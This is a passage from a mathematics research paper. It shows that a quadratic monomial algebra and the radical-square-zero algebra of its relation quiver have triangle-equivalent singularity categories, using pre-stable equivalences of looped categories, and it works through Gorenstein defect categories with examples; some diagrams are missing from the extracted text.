Assume that Fis fully faithful. Then (F,δ)is a pre-stable equivalence if and only if (S3) holds. Proof By the fully-faithfulness of F, the conditions (S1) and (S2) hold trivially. We just take i=0 in both the conditions.□ We say that two looped categories (C,Ω) and (C′,Ω′) are pre-stably quasi-equivalent provided that there exists a chain of looped categories (C,Ω)=(C1,Ω1),(C2,Ω2),…,(Cn,Ωn)=(C′,Ω′) (2.4) such that for each 1≤i≤n−1, there exists a pre-stable equivalence from (Ci,Ωi) to (Ci+1,Ωi+1), or a pre-stable equivalence from (Ci+1,Ωi+1) to (Ci,Ωi). We have the following immediate consequence of Proposition 2.2. Corollary 2.4 Let (C,Ω)and (C′,Ω′)be two looped categories which are pre-stably quasi-equivalent. Then there is a looped functor (S(C,Ω),Ω˜)⟶∼(S(C′,Ω′),Ω˜′),which is an equivalence.□ Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. A full subcategory X⊆C is said to be saturated provided that the following conditions are satisfied: (Sa1) For each object X in C, there is a morphism ηX:X→G(X) with G(X) in X such that F(ηX) is an isomorphism and that Ωd(ηX) is an isomorphism for some d≥0. (Sa2) For a morphism f:X→Y, there is a morphism G(f):G(X)→G(Y) with G(f)◦ηX=ηY◦f. (Sa3) The conditions (S1)–(S3) above hold by requiring that all the objects X,Y belong to X. Example 2.5 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Assume that F has a right adjoint functor G, which is fully faithful. Assume further that the unit η:IdC→GF satisfies the following condition: for each object X, there exists d≥0 with Ωd(ηX) an isomorphism. Take X to be the essential image of G. We claim that X⊆C is a saturated subcategory. Indeed, the restriction F∣X:X→C′ is an equivalence. Then (Sa3) holds trivially, by taking i to be zero in (S1)–(S3). The conditions (Sa1) and (Sa2) are immediate from the assumption. Here, we use the well-known fact that F(η) is a natural isomorphism, since G is fully faithful. Lemma 2.6 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor, and X⊆Ca saturated subcategory. Then the conditions (S1)–(S3) hold, that is, the functor (F,δ)is a pre-stable equivalence. Proof It suffices to verify (S1) and (S2). For (S1), take any morphism g:F(X)→F(Y) in C′. Consider g′=F(ηY)◦g◦F(ηX)−1:FG(X)→FG(Y). Then by (Sa3), there exist i≥0 and f′:Ωi(GX)→Ωi(GY) with Ω′i(g′)=δGYi◦F(f′)◦(δGXi)−1. We may assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Take f=(Ωi(ηY))−1◦f′◦Ωi(ηX), which is the required morphism in (S1). Let f,f′:X→Y be morphisms with F(f)=F(f′). Applying (Sa2) and using the isomorphisms F(ηX) and F(ηY), we have FG(f)=FG(f′). By (Sa3), we have ΩiG(f)=ΩiG(f′) for some i≥0. We assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Then we infer from (Sa2) that Ωi(f)=Ωi(f′). We are done with (S2).□ We will specialize the consideration to left triangulated categories. A looped category (C,Ω) is additive provided that C is an additive category and the loop functor Ω is an additive functor. We recall that a left triangulated category (C,Ω,E) consists of an additive looped category (C,Ω) and a class E of left triangles in C satisfying certain axioms, which are analogous to those for a triangulated category, but the endofunctor Ω is possibly not an auto-equivalence. The following convention is usual. We call a left triangulated category (C,Ω,E) a triangulated category, provided that the category (C,Ω) is stable, that is, the endofunctor Ω is an auto-equivalence. In this case, the translation functor Σ of C is a quasi-inverse of Ω. Then this notion is equivalent to the original one of a triangulated category in the sense of Verdier. For details, we refer to [5] and compare [21]. In what follows, we write C for the left triangulated category (C,Ω,E). A looped functor (F,δ) between two left triangulated categories C and C′=(C′,Ω′,E′) is called a triangle functor if F is an additive functor and sends left triangles to left triangles. We sometimes suppress the natural isomorphism δ and simply denote the triangle functor by F. A triangle functor which is a pre-stable equivalence is called a pre-triangle equivalence. Two left triangulated categories C and C′ are pre-triangle quasi-equivalent if they are pre-stably quasi-equivalent such that all the categories in (2.4) are left triangulated and all the pre-stable equivalences connecting them are pre-triangle equivalences. For a left triangulated category C=(C,Ω,E), the stabilized category S(C)≔(S(C,Ω),Ω˜,E˜) is a triangulated category, where the translation functor Σ=(Ω˜)−1 and the triangles in E˜ are induced by the left triangles in E; see [4, Section 3]. Corollary 2.7 Let Cand C′be two left triangulated categories which are pre-triangle quasi-equivalent. Then there is a triangle equivalence S(C)→∼S(C′).□ 3. The singularity categories and singular equivalences In this section, we recall the notion of the singularity category of an algebra. We shall show that for two algebras whose stable module categories are pre-triangle quasi-equivalent, their singularity categories are triangle equivalent; see Proposition 3.2 and compare Proposition 3.6 below. Let k be a commutative artinian ring with a unit. We emphasize that all the functors and categories are required to be k-linear in this section. Let A be an artin k-algebra. We denote by A-mod the category of finitely generated left A-modules, and by A-proj the full subcategory consisting of projective modules. We denote by A-mod̲ the stable category of A-mod modulo projective modules [3, p. 104]. The morphism space Hom̲A(M,N) of two modules M and N in A-mod̲ is defined to be HomA(M,N)/p(M,N), where p(M,N) denotes the k-submodule formed by morphisms that factor through projective modules. For a morphism f:M→N, we write f¯ for its image in Hom̲A(M,N). Recall that for an A-module M, its syzygy ΩA(M) is the kernel of its projective cover P(M)→pMM. We fix for M a short exact sequence 0→ΩA(M)→iMP(M)→pMM→0. This gives rise to the syzygy functor ΩA:A-mod̲→A-mod̲; see [3, p. 124]. Indeed, A-mod̲≔(A-mod̲,ΩA,EA) is a left triangulated category, where EA consists of left triangles that are induced from short exact sequences in A-mod. More precisely, given a short exact sequence 0→X→fY→gZ→0, we have the following commutative diagram: Then ΩA(Z)→h¯X→f¯Y→g¯Z is a left triangle in EA. As recalled in Section 2, the stabilized category S(A-mod̲) is a triangulated category. There is a more well-known description of this stabilized category as the singularity category; see [21]. To recall this, we denote by Db(A-mod) the bounded derived category of A-mod. We identify an A-module M with the corresponding stalk complex concentrated at degree zero, which is also denoted by M. Recall that a complex in Db(A-mod) is perfect provided that it is isomorphic to a bounded complex consisting of projective modules. The full subcategory consisting of perfect complexes is denoted by perf(A), which is a triangulated subcategory of Db(A-mod) and is closed under direct summands; see [7, Lemma 1.2.1]. Following [22], the singularity category of an algebra A is defined to be the Verdier quotient triangulated category Dsg(A)=Db(A-mod)/perf(A); compare [7, 15, 21]. We denote by q:Db(A-mod)→Dsg(A) the quotient functor. We denote a complex of A-modules by X•=(Xn,dn)n∈Z, where Xn are A-modules and the differentials dn:Xn→Xn+1 are homomorphisms of modules satisfying dn+1◦dn=0. The translation functor Σ both on Db(A-mod) and Dsg(A) sends a complex X• to a complex Σ(X•), which is given by Σ(X)n=Xn+1 and dΣXn=−dXn+1. Consider the following functor: FA:A-mod̲⟶Dsg(A) sending a module M to the corresponding stalk complex concentrated at degree zero, and a morphism f¯ to q(f). Here, the well-definedness of FA on morphisms is due to the fact that a projective module is isomorphic to the zero object in Dsg(A). For an A-module M, we consider the two-term complex C(M)=⋯→0→P(M)→pMM→0→⋯ with P(M) at degree zero. Then we have a quasi-isomorphism iM:ΩA(M)→C(M). The canonical inclusion canM:Σ−1(M)→C(M) becomes an isomorphism in Dsg(A). Then we have a natural isomorphism δM=q(canM)−1◦q(iM):FAΩA(M)⟶Σ−1FA(M). In other words, (FA,δ):(A-mod̲,ΩA)→(Dsg(A),Σ−1) is a looped functor. Indeed, FA is an additive functor and sends left triangles to (left) triangles. Then we have a triangle functor (FA,δ):A-mod̲⟶Dsg(A). Applying the universal property of the stabilization to (FA,δ), we obtain a strictly looped functor F˜A:S(A-mod̲)⟶Dsg(A), which is also a triangle functor; see [4, 3.1]. The following basic result is due to [21]. For a detailed proof, we refer to [4, Corollary 3.9]. Lemma 3.1 Keep the notation as above. Then F˜A:S(A-mod̲)→Dsg(A)is a triangle equivalence. By a singular equivalence between two algebras A and B, we mean a triangle equivalence between their singularity categories. Proposition 3.2 Let Aand Bbe two artin algebras. Assume that the stable categories A-mod̲and B-mod̲are pre-triangle quasi-equivalent. Then there is a singular equivalence between Aand B. Proof We just combine Lemma 3.1 and Corollary 2.7.□ In the following two examples, pre-triangle equivalences between stable module categories are explicitly given. We require that k acts centrally on any bimodules. Example 3.3 Let A and B′ be artin algebras, and let MB′A be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(A0MB′). We recall that a left B-module is a column vector (XY), where XA and YB′ are a left A-module and a left B′-module with an A-module homomorphism ϕ:M⊗B′Y→X, respectively; compare [3, III]. We call ϕ the structure morphism of the B-module (XY). Consider the natural full embedding i:A-mod→B-mod, sending an A-module X to i(X)=(X0). Since i preserves projective modules and is exact, it commutes with taking the syzygies. Then we have the induced functor i:A-mod̲→B-mod̲, which is a triangle functor. We claim that the induced functor i is a pre-triangle equivalence if and only if the algebra B′ has finite global dimension. In this case, by Proposition 3.2, there is a triangle equivalence Dsg(A)→∼Dsg(B); compare [9, Theorem 4.1(1)]. Indeed, the induced functor i is fully faithful. By Corollary 2.3, we only need to consider the condition (S3). Then we are done by the following fact: for any B-module (XY) and d≥0, we have ΩBd(XY)=(X′ΩB′d(Y)) for some A-module X′. Hence, if ΩB′d(Y)=0, the B-module ΩBd(XY) lies in the essential image of i. The following example is somehow more difficult. Example 3.4 Let A and B′ be artin algebras, and let NAB′ be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(B′0NA). We assume that B′ has finite global dimension. Consider the natural projection functor p:B-mod→A-mod, sending a B-module (XY) to the A-module Y. It is an exact functor which sends projective modules to projective modules. Then we have the induced functor p:B-mod̲→A-mod̲, which is a triangle functor. For an A-module Y, (0Y) is naturally a B-module with the zero structure morphism N⊗AY→0. Take X to be the full subcategory of B-mod̲ consisting of modules of the form (0Y). We claim that X is a saturated subcategory of B-mod̲. Then by Lemma 2.6, the induced functor p is a pre-triangle equivalence. Therefore, by Proposition 3.2, there is a triangle equivalence Dsg(B)→∼Dsg(A); compare [9, Theorem 4.1(2)]. We now prove the claim. For a B-module C=(XY), we consider the projection ηC:(XY)→G(C)=(0Y). Since its kernel has finite projective dimension, it follows that ΩBd(ηC) is an isomorphism for d large enough. We observe that p(ηC) is an isomorphism. Then we have (Sa1). The conditions (Sa2) and (Sa3) are trivial. Here for (S2) in X, we use the following fact: if a morphism f:Y→Y′ of A-module factors through a projective A-module P, then the morphism (0f):(0Y)→(0Y′) of B-modules factors though (0P), which has finite projective dimension; consequently, we have ΩBd(0f)=0 for d large enough. Let M be a left A-module. Then M*=HomA(M,A) is a right A-module. Recall that an A-module M is Gorenstein-projective provided that there is an acyclic complex P• of projective A-modules such that the Hom-complex (P•)*=HomA(P•,A) is still acyclic and that M is isomorphic to a certain cocycle Zi(P•) of P•. We denote by A-Gproj the full subcategory of A-mod formed by Gorenstein-projective A-modules. We observe that A-proj⊆A-Gproj. We recall that the full subcategory A-Gproj⊆A-mod is closed under direct summands, kernels of epimorphisms and extensions; compare [2, (3.11)]. In particular, for a Gorenstein-projective A-module M all its syzygies ΩAi(M) are Gorenstein-projective. Since A-Gproj⊆A-mod is closed under extensions, it becomes naturally an exact category in the sense of Quillen [24]. Moreover, it is a Frobenius category, that is, it has enough (relatively) projective and enough (relatively) injective objects, and the class of projective objects coincides with the class of injective objects. In fact, the class of projective-injective objects in A-Gproj equals A-proj. For details, we compare [4, Proposition 2.13]. We denote by A-Gproj̲ the full subcategory of A-mod̲ consisting of Gorenstein-projective A-modules. Then the syzygy functor ΩA restricts to an auto-equivalence ΩA:A-Gproj̲→A-Gproj̲. Moreover, the stable category A-Gproj̲ becomes a triangulated category such that the translation functor is given by a quasi-inverse of ΩA, and that the triangles are induced by short exact sequences in A-Gproj. These are consequences of a general result in [14, Chapter I.2]. The inclusion functor inc:A-Gproj̲→A-mod̲ is a triangle functor between left triangulated categories. We consider the composite of triangle functors GA:A-Gproj̲⟶incA-mod̲⟶FADsg(A). Let M,N be Gorenstein-projective A-modules. By the fully-faithfulness of the functor ΩA:A-Gproj̲→A-Gproj̲, the natural map Hom̲A(M,N)⟶HomS(A-mod̲)(M,N) induced by the stabilization functor S:A-mod̲→S(A-mod̲) is an isomorphism. We identify S(A-mod̲) with Dsg(A) by Lemma 3.1. Then this isomorphism implies that the triangle functor GA is fully faithful; compare [7, Theorem 4.1] and [15, Theorem 4.6]. Recall from [7, 15] that an artin algebra A is Gorenstein if the regular module A has finite injective dimension on both sides. Indeed, the two injective dimensions are equal. We mention that a self-injective algebra is Gorenstein, where any module is Gorenstein-projective. The following result is also known. As a consequence, for a self-injective algebra A the stable module category A-mod̲ and Dsg(A) are triangle equivalent; see [21] and [25, Theorem 2.1]. Lemma 3.5 Let Abe an artin algebra. Then the following statements are equivalent: The algebra Ais Gorenstein. The inclusion functor inc:A-Gproj̲→A-mod̲is a pre-triangle equivalence. The functor GA:A-Gproj̲→Dsg(A)is a triangle equivalence. Proof Recall that A is Gorenstein if and only if for any module X, there exists d≥0 with ΩAd(X) Gorenstein-projective; see [18]. The inclusion functor in (2) is fully faithful. By Corollary 2.3, it is a pre-triangle equivalence if and only if the condition (S3) in A-mod̲ is satisfied. Then the equivalence ‘ (1)⇔(2)’ follows. Since ΩA:A-Gproj̲→A-Gproj̲ is an auto-equivalence, we identify A-Gproj̲ with its stabilization S(A-Gproj̲). By Lemma 3.1, we identify Dsg(A) with S(A-mod̲). Then the functor GA is identified with the stabilization of the inclusion functor in (2). Then the equivalence ‘ (2)⇔(3)’ follows from Proposition 2.2. □ Recall from [6] that the Gorenstein defect category of an algebra A is defined to be the Verdier quotient triangulated category Ddef(A)=Dsg(A)/ImGA, where ImGA denotes the essential image of the fully-faithful triangle functor GA, and thus is a triangulated subcategory of Dsg(A). By Lemma 3.5(3), the algebra A is Gorenstein if and only if Ddef(A) is trivial; see also [6]. The following observation implies that pre-triangle equivalences seem to be ubiquitous in the study of singular equivalences; compare Proposition 3.2. Proposition 3.6 Let Aand Bbe artin algebras. Assume that Bis a Gorenstein algebra and that there is a singular equivalence between Aand B. Then there is a pre-triangle equivalence from A-mod̲to B-mod̲. Proof Using the triangle equivalence GB, we obtain a triangle equivalence H:Dsg(A)⟶B-Gproj̲. More precisely, we have H=GB−1L, where L:Dsg(A)→Dsg(B) is the assumed singular equivalence and GB−1 is a quasi-inverse of GB. Then we have the following composite of triangle functors: F:A-mod̲⟶FADsg(A)⟶HB-Gproj̲⟶incB-mod̲. We claim that F is a pre-triangle equivalence. Indeed, the functor FA is a pre-triangle equivalence by Lemma 3.1, where we identify Dsg(A) with its stabilization S(Dsg(A)). The inclusion functor is a pre-triangle equivalence by Lemma 3.5(2). Therefore, all the three functors above are pre-triangle equivalences. Then as their composition, so is the functor F.□ 4. The singularity category of a quadratic monomial algebra In this section, we study the singularity category of a quadratic monomial algebra A. We consider the algebra B with radical square zero that is defined by the relation quiver of A. The main result claims that there is a pre-triangle quasi-equivalence between the stable A-module category and the stable B-module category. Consequently, we obtain an explicit singular equivalence between A and B. For the ease of the reader, we recall some notation on quivers and quadratic monomial algebras. Let Q=(Q0,Q1;s,t) be a finite quiver, where Q0 is the set of vertices, Q1 the set of arrows, and s,t:Q1→Q0 are maps which assign to each arrow α its starting vertex s(α) and its terminating vertex t(α). A path p of length n in Q is a sequence p=αn⋯α2α1 of arrows such that s(αi)=t(αi−1) for 2≤i≤n; moreover, we define its starting vertex s(p)=s(α1) and its terminating vertex t(p)=t(αn). We observe that a path of length one is just an arrow. To each vertex i, we associate a trivial path ei of length zero, and set s(ei)=i=t(ei). For two paths p and q with s(p)=t(q), we write pq for their concatenation. As convention, we have p=pes(p)=et(p)p. For two paths p and q in Q, we say that q is a sub-path of p provided that p=p″qp′ for some paths p″ and p′. Let k be a field. The path algebra kQ of a finite quiver Q is defined as follows. As a k-vector space, it has a basis given by all the paths in Q. For two paths p and q, their multiplication is given by the concatenation pq if s(p)=t(q), and it is zero, otherwise. The unit of kQ equals ∑i∈Q0ei. Denote by J the two-sided ideal of kQ generated by arrows. Then Jd is spanned by all the paths of length at least d for each d≥2. A two-sided ideal I of kQ is admissible provided that Jd⊆I⊆J2 for some d≥2. In this case, the quotient algebra A=kQ/I is finite-dimensional. We recall that an admissible ideal I of kQ is quadratic monomial provided that it is generated by some paths of length two. In this case, the quotient algebra A=kQ/I is called a quadratic monomial algebra. Observe that the algebra A is with radical square zero if and only if I=J2. We call kQ/J2 the algebra with radical square zero defined by the quiver Q. In what follows, A=kQ/I is a quadratic monomial algebra. We denote by F the set of paths of length two contained in I. Following [29], a path p in Q is non-zero in A provided that it does not belong to I, or equivalently, p does not contain a sub-path in F. In this case, we abuse the image p+I in A with p. The set of non-zero paths forms a k-basis for A. For a path p in I, we write p=0 in A. For a non-zero path p, we consider the left ideal Ap generated by p, which has a k-basis given by the non-zero paths q such that q=q′p for some path q′. We observe that for a vertex i, Aei is an indecomposable projective A-module. Then we have a projective cover πp:Aet(p)→Ap sending et(p) to p. Lemma 4.1 Let A=kQ/Ibe a quadratic monomial algebra. Then the following statements hold: For a non-zero path p=αp′with αan arrow, there is an isomorphism Ap≃Aαof A-modules sending xpto xαfor any path xwith s(x)=t(p). For an arrow α, we have a short exact sequence of A-modules 0⟶⨁{β∈Q1∣βα∈F}Aβ⟶incAet(α)⟶παAα⟶0, (4.1)where ‘ inc’ denotes the inclusion map. For any A-module M, there is an isomorphism ΩA2(M)≃⨁α∈Q1(Aα)nαfor some integers nα. Proof (1) is trivial and (2) is straightforward; compare the first paragraph in [29, p. 162]. In view of (1), the statement (3) is a special case of [29, Theorem I].□ Let α be an arrow such that the set {β∈Q1∣βα∈F} is non-empty. By (4.1), this is equivalent to the condition that the A-module Aα is non-projective. Denote by N(α)={α′∈Q1∣t(α′)=t(α),βα′∈Fforeacharrowβsatisfyingβα∈F}. Set Z(α)=⨁α′∈N(α)α′A, which is the right ideal generated by N(α). We observe that α∈N(α). The second statement of the following result is analogous to [12, Lemma 2.3]. Lemma 4.2 Let α,α′be two arrows. We assume that the set {β∈Q1∣βα∈F}is non-empty. Then we have the following statements: There is an isomorphism HomA(Aα,A)→Z(α)sending fto f(α). There is a k-linear isomorphism Hom̲A(Aα,Aα′)=Z(α)∩Aα′Z(α)α′. (4.2) If α′does not belong to N(α), we have Hom̲A(Aα,Aα′)=0. If α′belongs to N(α), there is a unique epimorphism π=πα,α′:Aα→Aα′sending αto α′and Hom̲A(Aα,Aα′)=kπ¯. Proof We observe that Z(α) has a k-basis given by non-zero paths q which satisfy t(q)=t(α) and βq=0 for each arrow β with βα∈F. Then we infer (1) by applying HomA(−,A) to (4.1) and using the canonical isomorphism HomA(Aet(α),A)≃et(α)A. For (2), we identify for each left ideal K of A, HomA(Aα,K) with the subspace of HomA(Aα,A) formed by those morphisms whose image is contained in K. Therefore, we identify HomA(Aα,Aα′) with Z(α)∩Aα′, HomA(Aα,Aet(α′)) with Z(α)∩Aet(α′). Recall the projective cover πα′:Aet(α′)→Aα′. The subspace p(Aα,Aα′) formed by those morphisms factoring through projective modules equals the image of the map HomA(πα′,A). This image is then identified with Z(α)α′. Then the required isomorphism follows. The statement (3) is an immediate consequence of (2), since in this case we have Z(α)∩Aα′=Z(α)α′. For (4), we observe in this case that Z(α)∩Aα′=(Z(α)α′)⊕kα′. It follows from (3) that Hom̲A(Aα,Aα′) is one dimensional. The existence of the surjective homomorphism π is by the isomorphism in (1), under which π corresponds to the element α′. Then we are done.□ Remark 4.3 Assume that α′∈N(α). In particular, t(α)=t(α′). Then we have the following commutative diagram: The leftmost inclusion uses the fact that α′∈N(α), and thus {β∈Q1∣βα∈F}⊆{β∈Q1∣βα′∈F}. The following notion is taken from [12, Section 5]; compare [17]. Definition 4.4 Let A=kQ/I be a quadratic monomial algebra. Denote by F the set consisting of paths in Q, that are of length two and contained in I. The relation quiver RA of A is defined as follows. Its vertices are given by arrows in Q, and there is an arrow [βα] from α to β for each element βα in F. We will consider the algebra B=kRA/J2 with radical square zero defined by RA. The main result of this paper is as follows. Theorem 4.5 Let A=kQ/Ibe a quadratic monomial algebra, and let B=kRA/J2be the algebra with radical square zero defined by the relation quiver of A. Then there is a pre-triangle quasi-equivalence connecting A-mod̲and B-mod̲. Consequently, there is a singular equivalence between Aand B. For an arrow α in Q, we denote by Sα and Pα the simple B-module and the indecomposable projective B-module corresponding to the vertex α, respectively. We may identify Pα with Beα, where eα denotes the trivial path in RA at α. Hence, the B-module Pα has a k-basis {eα,[βα]∣βα∈F}. We observe the following short exact sequence of B-modules 0⟶⨁{β∈Q1∣βα∈F}Sβ⟶iαPα⟶Sα⟶0, (4.3) where iα identifies Sβ with the B-submodule k[βα]. We denote by B-ssmod̲ the full subcategory of B-mod̲ consisting of semisimple B-modules. We observe that for any B-module M, the syzygy ΩB(M) is semisimple; compare [11, Lemma 2.1]. Moreover, any homomorphism f:X→Y between semisimple modules splits, that is, it is isomorphic to a homomorphism of the form (00IdZ0):K⊕Z→C⊕Z for some B-modules K, C and Z. We infer that B-ssmod̲⊆B-mod̲ is a left triangulated subcategory. Moreover, all left triangles inside B-ssmod̲ are direct sums of trivial ones. There is a unique k-linear functor F:B-ssmod̲→A-mod̲ sending Sα to Aα for each arrow α in Q. Here, for the well-definedness of F, we use the following fact, which can be obtained by comparing (4.1) and (4.3): the simple B-module Sα is projective if and only if so is the A-module Aα. We have the following key observation. Lemma 4.6 The functor F:B-ssmod̲→A-mod̲is a pre-triangle equivalence. Proof Let α be an arrow in Q. We observe that (4.1) and (4.3) compute the syzygies modules ΩA(Aα) and ΩB(Sα), respectively. It follows that the functor F commutes with the syzygy functors. In other words, there is a natural isomorphism δ:FΩA→ΩBF such that (F,δ) is a looped functor. Since all morphisms in B-ssmod̲ split, each left triangle inside is a direct sum of trivial ones. It follows that F respects left triangles, that is, (F,δ) is a triangle functor. We verify the conditions (S1)–(S3) in Proposition 2.2. Then we are done. Since the functor F is faithful, (S2) follows. The condition (S3) follows from Lemma 4.1(3). For (S1), we take a morphism g:F(X)→F(Y) in A-mod̲. Without loss of generality, we assume that both X and Y are indecomposable, in which case both are simple B-modules. We assume that X=Sα and Y=Sα′. We assume that g is non-zero, in particular, F(X)=Aα is non-projective, or equivalently, the set {β∈Q1∣βα∈F} is non-empty. Observe that F(Y)=Aα′. We apply Lemma 4.2(3) to infer that α′∈N(α). Write π=πα,α′. By Lemma 4.2(4), we may assume that g=π¯. The commutative diagram in Remark 4.3 implies that ΩA(g) equals the inclusion morphism ⨁{β∈Q1∣βα∈F}Aβ⟶⨁{β∈Q1∣βα′∈F}Aβ. Take f to be the corresponding inclusion morphism ΩB(Sα)=⨁{β∈Q1∣βα∈F}Sβ⟶ΩB(Sα′)=⨁{β∈Q1∣βα′∈F}Sβ in B-ssmod̲. Then we identify F(f) with ΩA(g); more precisely, we have F(f)=δY◦ΩA(g)◦(δX)−1. This proves the condition (S1).□ We now prove Theorem 4.5. Proof of Theorem4.5. Consider the inclusion functor inc:B-ssmod̲→B-mod̲. As mentioned above, this is a triangle functor. Recall that the syzygy of any B-module is semisimple, that is, it lies in B-ssmod̲. Then the inclusion functor is a pre-triangle equivalence by Corollary 2.3. Recall the pre-triangle equivalence F:B-ssmod̲→A-mod̲ in Lemma 4.6. Then we have the required pre-triangle quasi-equivalence A-mod̲⟵FB-ssmod̲⟶incB-mod̲. The last statement follows from Proposition 3.2. We mention that by the explicit construction of the functor F, the resulting triangle equivalence Dsg(A)→Dsg(B) sends Aα to Sα for each arrow α in Q.□ Remark 4.7 We will observe in the proof of Proposition 5.3 below that the singular equivalence in Theorem 4.5 restricts to a triangle equivalence between A-Gproj̲ and B-Gproj̲. Consequently, it induces a triangle equivalence between Ddef(A) and Ddef(B). We emphasize that in general a singular equivalence will not induce a triangle equivalence between Gorenstein defect categories. 5. Consequences and examples In this section, we draw some consequences of Theorem 4.5 and describe some examples. We first make some preparation by recalling some known results on the singularity category of an algebra with radical square zero. For a finite quiver Q, we recall that a vertex in Q is a sink if there is no arrow starting at it. We denote by Q0 the quiver without sinks, that is obtained from Q by repeatedly removing sinks. The double quiver Q¯ of Q is obtained from Q by adding for each α∈Q1 a new arrow α* in the reverse direction, that is, s(α*)=t(α) and t(α*)=s(α). Recall that the Leavitt path algebra L(Q) of Q with coefficients in k is the quotient algebra of kQ¯ modulo the two-sided ideal generated by the following elements: {αβ*−δα,βet(α)∣α,β∈Q1}∪{∑{α∈Q1∣s(α)=i}α*α−ei∣i∈Q0non-sink}. Here, δ denotes the Kronecker symbol. Then L(Q) has a natural Z-grading by degei=0degα=1 and degα*=−1. We denote by L(Q)-grproj the category of finitely generated Z-graded left L(Q)-modules, and by (−1):L(Q)-grproj→L(Q)-grproj the degree-shift functor by degree −1. For details on Leavitt path algebras, we refer to [1, 13, 27]. We denote by kQ/J2 the algebra with radical square zero defined by Q. For n≥1, we denote by Zn the basic n-cycle, which is a connected quiver consisting of n vertices and n arrows which form an oriented cycle. Then the algebra kZn/J2 is self-injective. In particular, the stable module category kZn/J2-mod̲ is triangle equivalent to Dsg(kZn/J2). An abelian category A is semisimple if any short exact sequence splits. For example, if the quiver Q has no sinks, the category L(Q)-grproj is a semisimple abelian category; see [13, Lemma 4.1]. For a semisimple abelian category A and an auto-equivalence Σ on A, there is a unique triangulated structure on A with Σ the translation functor. Indeed, all triangles are direct sums of trivial ones. The resulting triangulated category is denoted by (A,Σ); see [10, Lemma 3.4]. As an example, we will consider the triangulated category (L(Q)-grproj,(−1)) for a quiver Q without sinks. Example 5.1 Let kn=k×k×⋯×k be the product algebra of n copies of k. Consider the automorphism σ:kn→kn sending (a1,a2,…,an) to (a2,…,an,a1), which induces an automorphism σ*:kn-mod→kn-mod by twisting the kn-action on modules. We observe that there are triangle equivalences (kn-mod,σ*)⟶∼kZn/J2-mod̲⟶∼(L(Zn)-grproj,(−1)). The first equivalence is well known and the second one is a special case of [13, Theorem 6.1]. We will denote this triangulated category by Tn. Let Q be a finite quiver. We call a connected component C of Qperfect (resp. acyclic) if it is a basic cycle (resp. it has no oriented cycles). A connected component is defect if it is neither perfect nor acyclic. Then we have a disjoint union Q=Qperf∪Qac∪Qdef, where Qperf (resp. Qac, Qdef) is the union of all the perfect (resp. acyclic, defect) components in Q. Denote by B=kQ/J2. Then we have a decomposition of algebras B=Bperf×Bac×Bdef. We summarize the known results on the singularity category and the Gorenstein defect category of an algebra with radical square zero. Lemma 5.2 Keep the notation as above. Then the following statements hold: There is a triangle equivalence Dsg(B)≃Bperf-mod̲×Dsg(Bdef). There is a triangle equivalence B-Gproj̲≃Bperf-mod̲, which is triangle equivalent to a product of categories Tn. There is a triangle equivalence Ddef(B)≃Dsg(Bdef), which is triangle equivalent to (L((Qdef)0)-grproj,(−1)). Proof We observe that the algebra Bperf is self-injective and that Bac has finite global dimension. Then (1) is a consequence of the decomposition Dsg(B)=Dsg(Bperf)×Dsg(Bac)×Dsg(Bdef) of categories. For (2), we note that any Bperf-module is Gorenstein-projective and that a Gorenstein-projective Bac-module is necessarily projective. By [11, Theorem 1.1] any Gorenstein-projective Bdef-module is projective. Then (2) follows by a similar decomposition of B-Gproj̲. The last statement follows from Example 5.1, since Bperf is isomorphic to a product of algebras of the form kZn/J2. By (1) and (2), the functor GB:B-Gproj̲→Dsg(B) is identified with the inclusion. The required triangle equivalence in (3) follows immediately. The last sentence follows by combining [10, Proposition 4.2] and [13, Theorem 6.1]; compare [10, Theorem B] and [27, Theorem 5.9].□ In what follows, let A=kQ/I be a quadratic monomial algebra with RA its relation quiver. We denote by {C1,C2,…,Cm} the set of all the perfect components in RA, and by di the number of vertices in the basic cycle Ci. Let B=kRA/J2 be the algebra with radical square zero defined by RA. We consider the triangle equivalence Φ:Dsg(A)→Dsg(B) obtained in Theorem 4.5. We identify the fully faithful functors GA and GB as inclusions. The following result describes the singularity category and the Gorenstein defect category of a quadratic monomial algebra. We mention that the equivalence in Proposition 5.3(2) is due to [12, Theorem 5.7], which is obtained by a completely different method. Proposition 5.3 The triangle equivalence Φ:Dsg(A)→Dsg(B)restricts to a triangle equivalence A-Gproj̲→∼B-Gproj̲, and thus induces a triangle equivalence Ddef(A)→∼Ddef(B). Consequently, we have the following triangle equivalences: Dsg(A)→∼A-Gproj̲×Ddef(A); A-Gproj̲→∼Bperf-mod̲→∼Td1×Td2×⋯×Tdm; Ddef(A)→∼Dsg(Bdef)→∼(L(Q′)-grproj,(−1)) with Q′=(RAdef)0. Proof Recall from the proof of Theorem 4.5 that Φ(Aα)=Sα for each arrow α in Q. By [12, Lemma 5.4(1)] the A-module Aα is non-projective Gorenstein-projective if and only if α, as a vertex, lies in a perfect component of RA. Moreover, any indecomposable non-projective Gorenstein-projective A-module arises in this way. On the other hand, any indecomposable non-projective Gorenstein-projective B-module is of the form Sα with α in RAperf; see Lemma 5.2(2). It follows that the equivalence Φ restricts to the equivalence A-Gproj̲→∼B-Gproj̲. The three triangle equivalences follow immediately from the equivalences in Lemma 5.2.□ We end the paper with examples on Proposition 5.3. Example 5.4 Let A be a quadratic monomial algebra which is Gorenstein. By [12, Proposition 5.5(1)], this is equivalent to the condition that the relation quiver RA has no defect components. For example, a gentle algebra is such an example. Note that Ddef(A) is trivial. Then we obtain a triangle equivalence Dsg(A)⟶∼Td1×Td2×⋯×Tdm, where di’s denote the sizes of the perfect components of RA. This result extends [20, Theorem 2.5(b)]; see also [8]. Example 5.5 Let A=k⟨x,y⟩/I be the quotient algebra of the free algebra k⟨x,y⟩ by the ideal I=(x2,y2,yx). Then the relation quiver RA is as follows: The relation quiver has no perfect components. Then we have triangle equivalences Dsg(A)≃Ddef(A)≃(L(RA)-grproj,(−1)). Example 5.6 Consider the following quiver Q and the algebra A=kQ/I with I=(βα,αβ,δγ,γδ,δξ): Its relation quiver RA is as follows: There are one perfect component and one defect component; moreover, we observe (RAdef)0=Z2. Then we have triangle equivalences A-Gproj̲≃T2 and Ddef(A)≃(L(Z2)-grproj,(−1)), which is equivalent to T2; see Example 5.1. Therefore, we have a triangle equivalence Dsg(A)≃T2×T2. 